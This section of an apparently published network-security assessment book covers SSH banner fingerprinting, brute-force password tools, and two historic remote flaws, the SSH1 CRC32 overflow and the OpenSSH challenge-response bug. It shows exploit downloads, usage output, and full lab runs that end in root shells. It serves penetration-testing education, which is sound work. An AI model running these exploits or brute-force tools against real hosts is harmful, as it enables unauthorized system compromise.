7.2 SSH

Secure Shell (SSH) provides encrypted access to Unix and Win32 command shells. Weaknesses in plaintext services such as Telnet were often abused by attackers to compromise networks, so SSH was introduced to provide encrypted access to Unix-based hosts for maintenance purposes.

Before 1999, the only SSH servers available were for commercial use and provided by SSH Communications (http://www.ssh.com) and F-Secure (http://www.f-secure.com). In late 1999, the OpenBSD team worked to provide SSH support in Version 2.6 of their operating system, and OpenSSH 1.2.2 was born. Commercial versions provided by SSH Communications and F-Secure remain supported and are sold, but OpenSSH has proved to be extremely popular and is now included with most Linux distributions.

Due to its cryptographic nature, an SSH client is required to connect to and authenticate with SSH. The free OpenSSH package can be downloaded from http://www.openssh.com.

For Windows users, PuTTY is a freely downloadable tool available with a host of other SSH client utilities (including PSCP, PSFTP, and Plink) available from http://www.chiark.greenend.org.uk/~sgtatham/putty/.

7.2.1 SSH Fingerprinting

To correctly ascertain vulnerabilities that may be present in the target SSH service, first perform banner grabbing by using telnet or nc to connect to the SSH service. Example 7-1 shows how telnet can do this: the banner shows the host is running OpenSSH 3.5 patch level 1 using the SSH 2.0 protocol.

Example 7-1. Grabbing the SSH service banner using telnet

# telnet 192.168.0.80 22 Trying 192.168.0.80... Connected to 192.168.0.80. Escape character is '^]'. SSH-2.0-OpenSSH_3.5p1

Security conscious administrators will often modify the SSH banner to present false information. Example 7-2 shows this: the SSH service supports the SSH 2.0 protocol, but the actual type and version of the service itself is unknown (it's set to 0.0.0).

Example 7-2. Grabbing a modified SSH service banner

# telnet 192.168.189.2 22 Trying 192.168.189.2... Connected to 192.168.189.2. Escape character is '^]'. SSH-2.0-0.0.0

Here's a list of common SSH service fingerprints:

Cisco SSH 1.25

# telnet 192.168.189.254 22 Trying 192.168.189.254... Connected to 192.168.189.254. Escape character is '^]'. SSH-1.5-Cisco-1.25

SSH Communications SSH 2.2.0

# telnet 192.168.189.18 22 Trying 192.168.189.18... Connected to 192.168.189.18. Escape character is '^]'. SSH-1.99-2.2.0

F-Secure SSH 1.3.6

# telnet 192.168.189.26 22 Trying 192.168.189.26... Connected to 192.168.189.26. Escape character is '^]'. SSH-1.5-1.3.6_F-SECURE_SSH

If SSH-1.99 is reported by the SSH service, both SSH 1.5 and 2.0 protocols are supported. Some SSH clients, such as PuTTY, previously didn't support SSH 2.0, and many administrators accordingly ran their services to be backward-compatible.

7.2.2 SSH Brute-Force Password Grinding

By its very design, SSH is a protocol resilient to brute-force attacks. The service first accepts the username and then allows for three passwords to be provided. If the user fails to provide the correct username and password combination, the unauthorized access attempt is written to the system log.

Sebastian Krahmer wrote a threaded SSH2 brute-force tool called guess-who. The utility allows for up to 30 attempts per second on internal networks, so mileage varies across the Internet depending on server configuration and connection speed. The tool compiles cleanly in Unix environments; find it at http://packetstormsecurity.org/groups/teso/guess-who-0.44.tgz.^[1]

^[1] URLs for tools in this book are mirrored at the O'Reilly site, http://examples.oreilly.com/networksa/tools.

An expect script available from http://examples.oreilly.com/networksa/tools/55hb.txt is a simple way to perform brute force against both SSH1 and SSH2 services. The 55hb script simply parses usernames and passwords to the Unix SSH client binary.

7.2.3 SSH Vulnerabilities

The presence of process manipulation vulnerabilities within SSH services depends on two things:

• The SSH server and version in use (OpenSSH, LSH, Cisco, or commercial SSH)

• The SSH protocol version the target server supports (1.0, 1.5, 1.99, or 2.0)

Knowing the SSH service type, version, and which protocols are supported, you can check vulnerability databases and sites, including MITRE CVE, ISS X-Force, SecurityFocus, and Packet Storm, to ascertain whether the services at hand are vulnerable to attack.

Two serious remote vulnerabilities uncovered in SSH since 2001 are the SSH1 CRC32 compensation vulnerability and the OpenSSH 2.9.9-3.3 challenge-response bug. In the next few sections, I discuss these bugs along with examples of exploitation. Many other bugs have been found in SSH, but they rely on nondefault options enabled at compilation or on valid username and password combination (these are known as post-authentication vulnerabilities).

7.2.3.1 SSH1 CRC32 compensation vulnerability

On February 8, 2001, CORE-SDI released an advisory documenting a remote integer overflow in several implementations of the SSH1 protocol. Ironically, this vulnerability is located in a segment of code that was introduced to defend against exploitation of CRC32 weaknesses within the SSH1 protocol (see http://www.kb.cert.org/vuls/id/13877).

The attack detection function (detect_attack( ) located in deattack.c) uses a dynamically allocated hash table to store connection information that is then examined to detect and respond to CRC32 attacks. By sending a crafted SSH1 packet to a vulnerable host, an attacker can cause the SSH service to create a hash table with a size of zero, resulting in an overflow and arbitrary code being executed.

Full details of this vulnerability and vendor patches are available at:

http://www.securityfocus.com/advisories/3088

http://www.kb.cert.org/vuls/id/945216

http://xforce.iss.net/xforce/xfdb/6083

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0144

Nowadays, most SSH servers support only Version 2 of the protocol and aren't susceptible to this attack. If you see a server respond with a 1.5 or 1.99 protocol string in its banner, it is probably vulnerable.

7.2.3.2 SSH1 CRC32 compensation exploit

Later in 2001, a publicly available (but Linux precompiled) exploit known as x2, x4, or shack became available, mirrored at http://packetstormsecurity.org/0201-exploits/cm-ssh.tgz.

Example 7-3 shows how I download, unpack, and run the precompiled Linux shack exploit, revealing command-line options and available target offsets.

Example 7-3. Downloading and running shack

# wget http://packetstormsecurity.org/0201-exploits/cm-ssh.tgz # tar xvfz cm-ssh.tgz shack sscan targets # ./shack SSHD deattack exploit. By Dvorak with Code from teso error: No target specified Usage: sshd-exploit -t# <options> host [port] Options:         -t num (mandatory)  defines target, use 0 for target list         -X string           skips certain stages # ./shack -t0 SSHD deattack exploit. By Dvorak with Code from teso Targets: ( 1)    Small - SSH-1.5-1.2.27 ( 2)    Small - SSH-1.99-OpenSSH_2.2.0p1 ( 3)    Big - SSH-1.99-OpenSSH_2.2.0p1 ( 4)    Small - SSH-1.5-1.2.26 ( 5)    Big - SSH-1.5-1.2.26 ( 6)    Small - SSH-1.5-1.2.27 ( 7)    Big - SSH-1.5-1.2.27 ( 8)    Small - SSH-1.5-1.2.31 ( 9)    Big - SSH-1.5-1.2.31 (10)    Small - SSH-1.99-OpenSSH_2.2.0p1 (11)    Big - SSH-1.99-OpenSSH_2.2.0p1

I can now launch the exploit against my vulnerable Red Hat Linux 6.2 server running OpenSSH 2.2.0p1 at 192.168.189.254 using target number 10, as shown in Example 7-4.

Example 7-4. Compromising a Red Hat 6.2 host using shack

# ./shack -t10 192.168.189.254 22 SSHD deattack exploit. By Dvorak with Code from teso Target: Small - SSH-1.99-OpenSSH_2.2.0p1 Attacking: 192.168.189.254:22 Testing if remote sshd is vulnerable # ATTACH NOW YES # Finding h - buf distance (estimate) (1 ) testing 0x00000004 # SEGV # (2 ) testing 0x0000c804 # FOUND # Found buffer, determining exact diff Finding h - buf distance using the teso method (3 ) binary-search: h: 0x083fb7fc, slider: 0x00008000 # SEGV # (4 ) binary-search: h: 0x083f77fc, slider: 0x00004000 # SURVIVED # (5 ) binary-search: h: 0x083f97fc, slider: 0x00002000 # SURVIVED # (6 ) binary-search: h: 0x083fa7fc, slider: 0x00001000 # SURVIVED # (7 ) binary-search: h: 0x083faffc, slider: 0x00000800 # SEGV # (8 ) binary-search: h: 0x083fabfc, slider: 0x00000400 # SEGV # (9 ) binary-search: h: 0x083fa9fc, slider: 0x00000200 # SEGV # (10) binary-search: h: 0x083fa8fc, slider: 0x00000100 # SURVIVED # (11) binary-search: h: 0x083fa97c, slider: 0x00000080 # SURVIVED # (12) binary-search: h: 0x083fa9bc, slider: 0x00000040 # SURVIVED # (13) binary-search: h: 0x083fa9dc, slider: 0x00000020 # SURVIVED # (14) binary-search: h: 0x083fa9ec, slider: 0x00000010 # SURVIVED # (15) binary-search: h: 0x083fa9f4, slider: 0x00000008 # SEGV # Bin search done, testing result Finding exact h - buf distance (16) trying: 0x083fa9ec # SURVIVED # Exact match found at: 0x00005614 Looking for exact buffer address Finding exact buffer address (124) Trying: 0x080e0614 # SURVIVED # Finding distance till stack buffer (134) Trying: 0xb7f242f4 # SURVIVED # verifying (135) Trying: 0xb7f242f4 # SEGV # OK Finding exact h - stack_buf distance (140) trying: 0xb7f24154  slider: 0x0020# SURVIVED # (141) trying: 0xb7f24144  slider: 0x0010# SURVIVED # (142) trying: 0xb7f2413c  slider: 0x0008# SEGV # (143) trying: 0xb7f24140  slider: 0x0004# SEGV # (144) trying: 0xb7f24142  slider: 0x0002# SEGV # Final stack_dist: 0xb7f24144 EX: buf: 0x080dd614 h: 0x080d8000 ret-dist: 0xb7f240ca ATTACH NOW Changing MSW of return address to: 0x080d Crash, finding next return address Changing MSW of return address to: 0x080e Crash, finding next return address EX: buf: 0x080dd614 h: 0x080d8000 ret-dist: 0xb7f240ae ATTACH NOW Changing MSW of return address to: 0x080d Crash, finding next return address Changing MSW of return address to: 0x080e No Crash, might have worked Reply from remote: CHRIS CHRIS ***** YOU ARE IN ***** Linux www 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000 i686 unknown uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

The exploit takes a few minutes to run because it performs binary searching and return-address brute-forcing to inject and run its shellcode. Chapter 13 discusses exploitation issues in some detail, discussing differences between simple stack overwrites, integer overflows, and heap-corruption vulnerabilities. The original x2 exploit source code is extremely rare, but it's available from the O'Reilly archive at http://examples.oreilly.com/networksa/tools/x2src.tgz.

7.2.3.3 OpenSSH challenge-response vulnerability

On June 26, 2002, Internet Security Systems (ISS) released an advisory documenting a remotely exploitable heap overflow bug within the challenge-response authentication mechanism of OpenSSH (present within Versions 2.9.9 to 3.3). To exploit this vulnerability, the target SSH service must compiled with BSD_AUTH or SKEY authentication options enabled, which is the case within OpenBSD 3.0 and 3.1 in particular.

Full details of the vulnerability and respective vendor patches are available at:

http://xforce.iss.net/xforce/xfdb/9169

http://www.cert.org/advisories/CA-2002-18.html

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0639

7.2.3.4 OpenSSH challenge-response exploit

ISS hasn't release any public exploit code relating to this vulnerability. The GOBBLES security team, however, released an SSH client patch exploit to remotely compromise OpenBSD 3.0 and 3.1 hosts running OpenSSH 2.9.9 to 3.3; it's available at http://www.immunitysec.com/GOBBLES/exploits/sshutup-theo.tar.gz.

After compiling a patched SSH client (gobblessh), you can run the tool and reveal the usage and supported options, as shown in Example 7-5.

Example 7-5. The gobblessh usage and options

# ./gobblessh  GOBBLES SECURITY - WHITEHATS POSTING TO BUGTRAQ FOR FAME OpenSSH 2.9.9 - 3.3 remote challenge-response exploit #1 rule of ``ethical hacking'': drop dead   Usage: gobblessh [options] host Options: ***** READ THE HOWTO FILE IN THE TARBALL *****   -l user     Log in using this user name.   -p port     Connect to this port.   -M method   Select the device (skey or bsdauth)               default: bsdauth   -S style    If using bsdauth, select the style               default: skey   -d rep      Test shellcode repeat               default: 10000 (with -z) ; 0 (without -z)   -j size     Chunk size               default: 4096 (1 page)   -r rep      Connect-back shellcode repeat               default: 60 (not used with -z)   -z          Enable testing mode   -v          Verbose; display verbose debugging messages.               Multiple -v increases verbosity.

Example 7-6 shows the exploit being run against a fresh install of OpenBSD 3.0 at 192.168.189.12 to gain super-user privileges.

Example 7-6. Compromising an OpenBSD server using gobblessh

# ./gobblessh -l root 192.168.189.12 [*] remote host supports ssh2 Warning: Permanently added '192.168.189.12' (RSA) to the list of known hosts. [*] server_user: root:skey [*] keyboard-interactive method available [*] chunk_size: 4096 tcode_rep: 0 scode_rep 60 [*] mode: exploitation *GOBBLE* OpenBSD openbsd 3.0 192.168.189.12 i386 uid=0(root) gid=0(wheel) groups=0(wheel)

7.2.3.5 Other remotely exploitable SSH flaws

At the time of writing, the CERT vulnerability notes at http://www.kb.cert.org/vuls/ list the remotely exploitable vulnerabilities in SSH services (not including denial-of-service or locally exploitable issues); they are detailed in Table 7-1.